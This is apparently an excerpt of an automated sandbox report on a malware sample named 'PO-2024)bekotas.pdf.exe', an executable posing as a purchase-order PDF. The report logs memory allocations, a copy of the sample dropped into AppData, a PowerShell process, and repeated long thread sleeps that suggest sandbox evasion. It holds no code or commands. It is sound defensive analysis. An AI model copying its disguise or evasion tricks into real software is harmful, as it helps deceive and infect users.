                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeMemory allocated: 4AA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 2D00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 2F80000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 2D00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 78F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 88F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 8A90000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 9A90000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 9DC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: ADC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: BDC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: D260000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: E260000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: F260000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: F8B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 11B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 2B90000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 4B90000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 14D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 32A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 17F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 80C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 90C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 9270000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: A270000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: A5D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: B5D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: C5D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: D690000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: E690000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: F690000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: FD30000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 2A40000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 2BD0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 4BD0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2400000Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2399875Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2399765Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2399656Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2399547Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2399437Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2399328Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2399219Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2399109Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2399000Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2398890Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2398781Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2398672Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2398562Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2398453Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2398343Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2398234Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2398088Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2397983Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2397875Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2397765Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2397656Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2397547Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2397437Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2397328Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2397219Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2397109Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2397000Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2396891Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2396781Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2396672Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2396562Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2396453Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2396344Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2396234Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2396125Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2396015Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2395906Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2395797Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2395687Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2395578Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2395469Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2395359Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2395249Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2395140Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2395031Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2394921Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2394812Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2394703Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2394594Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399891Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399781Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399672Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399562Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399453Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399343Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399234Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399125Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399015Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398906Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398797Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398687Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398578Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398469Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398357Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398247Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398140Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398031Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397915Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397810Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397703Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397590Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397482Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397375Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397265Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397156Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397047Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396937Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396828Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396719Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396609Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396499Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396390Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396272Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396156Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396047Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395937Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395828Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395719Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395609Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395499Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395390Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395234Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395109Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394891Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394781Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394672Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394562Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394453Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394344Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399891Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399781Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399672Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399563Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399453Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399344Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399235Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399110Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398985Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398860Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398735Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398610Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398485Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398360Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398245Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398125Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398016Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397891Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397766Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397655Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397532Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397420Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397297Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397188Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397078Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396969Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396860Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396735Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396610Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396485Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396360Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396235Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396110Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395985Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395860Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395735Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395610Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395485Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395360Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395235Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395110Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394985Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394860Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394735Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394610Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394485Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394360Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394235Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394110Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1076Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeWindow / User API: threadDelayed 8594Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeWindow / User API: threadDelayed 1271Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWindow / User API: threadDelayed 4781Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWindow / User API: threadDelayed 5065Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWindow / User API: threadDelayed 2154Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWindow / User API: threadDelayed 7666Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 6256Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6500Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -24903104499507879s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2400000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 3220Thread sleep count: 8594 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2399875s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 3220Thread sleep count: 1271 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2399765s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2399656s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2399547s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2399437s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2399328s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2399219s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2399109s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2399000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2398890s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2398781s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2398672s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2398562s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2398453s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2398343s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2398234s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2398088s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2397983s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2397875s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2397765s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2397656s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2397547s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2397437s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2397328s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2397219s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2397109s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2397000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2396891s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2396781s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2396672s >= -30000sJump to behavior
